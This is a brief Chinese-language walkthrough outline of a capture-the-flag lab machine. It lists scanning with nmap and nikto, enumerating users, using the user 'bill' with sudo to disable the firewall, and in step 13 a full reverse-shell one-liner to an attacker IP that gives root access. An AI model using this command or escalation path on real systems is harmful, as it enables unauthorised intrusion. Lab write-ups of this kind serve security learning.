开门见山
1. 扫描靶机ip,发现PCS 172.18.5.1
2. 用nmap扫描靶机开放服务和服务版本
3. 再扫描靶机全部信息
4. 用nikto工具扫描http服务的敏感信息
5. 打开浏览器查看发现的网页
6. 查看临时缓冲目录
7. 查看home目录,挖掘用户信息
8. 查看具体用户的目录
9. 查看靶机的信息
10. 利用ssh命令,执行root权限命令
11. 用bill执行root权限关闭防火墙
12. 攻击机启动监听
13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1
14. 攻击机终端收到反馈shell
15. 还有一种shell反弹
16. 在 /root目录下查找flag文件并查看
